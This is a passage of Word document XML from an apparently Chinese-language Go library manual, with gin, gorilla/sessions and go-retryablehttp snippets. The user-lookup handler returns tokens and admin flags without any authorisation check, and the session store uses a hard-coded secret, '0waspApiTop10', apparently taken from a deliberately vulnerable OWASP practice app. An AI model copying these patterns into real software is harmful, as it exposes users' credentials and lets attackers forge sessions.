        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，唯一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23377706" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Username string `json:"username"` //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名，唯一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDD602" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Email    string `json:"email"`    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱，唯一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667C060" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Admin    int    `json:"admin"`    //0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：普通用户，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：管理员，默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654BFECF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7B4688" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274DA87F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gin.Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6945E8DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// GetInfoByUserID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02CF6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func GetInfoByUserID(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c *gin.Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC9FCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>var info infoResponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB6A71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>db := SqliteConn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5F4B43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>defer db.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED73DDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526CBF6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>id := c.Params.ByName("id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F84304" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>if id == "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2FAD72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>c.JSON(400, gin.H{"code": 400, "msg": "Need id!"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231DC2B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C380DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32332900" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if !CheckID(id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8BDDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>c.JSON(400, gin.H{"code": 400, "msg": "Format error!"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D58B176" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9CBE2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38BB0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>sql := "SELECT id,token,username,email,admin FROM user WHERE id = ? LIMIT 1;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C1752" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>row := db.QueryRow(sql, id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC77078" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>err := row.Scan(&amp;info.ID, &amp;info.Token, &amp;info.Username, &amp;info.Email, &amp;info.Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7032709A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A16A8F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>c.JSON(400, gin.H{"code": 400, "msg": "ID error!"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325C466C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19067667" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F906BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>c.JSON(200, gin.H{"code": 200, "data": info})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178458C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E9525" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BC97E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1BCB6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="330" w:name="_Toc159779787"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>github.com/gorilla/sessions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="330"/>
    </w:p>
    <w:p w14:paraId="0B5857B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sessions.FilesystemStore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729BAA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA9B31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215090AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACB09A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"encoding/gob"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3E061D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487D5416" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0FA9C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F0422D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"github.com/gorilla/sessions"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0627BC3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6CA48F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF1D13A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>//sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>存储于文件系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F4584A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EBEDE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>Store     *sessions.FilesystemStore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541229F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>SecretKey = []byte("0waspApiTop10")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E065A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8CD13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D03316" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62449D05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>err := os.MkdirAll("sessions", 0755)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D48B456" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B3A2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("create sessions dir error:", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033E921" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283587B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Store = sessions.NewFilesystemStore("sessions", SecretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E610B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1C38DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Store.Options = &amp;sessions.Options{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE54D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>MaxAge: 24 * 60 * 60, //1 day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9692E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D4B3D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>gob.Register(User{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35035C47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7D33B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6F5B32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0A6210" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6260AB92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="331" w:name="_Toc159779788"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/hashicorp/go-retryablehttp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="331"/>
    </w:p>
    <w:p w14:paraId="31A2DCE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5000593D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/hashicorp/go-retryablehttp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C4729" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF2CD1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>retryablehttp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包提供了一个熟悉的带有自动重试和指数回退的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
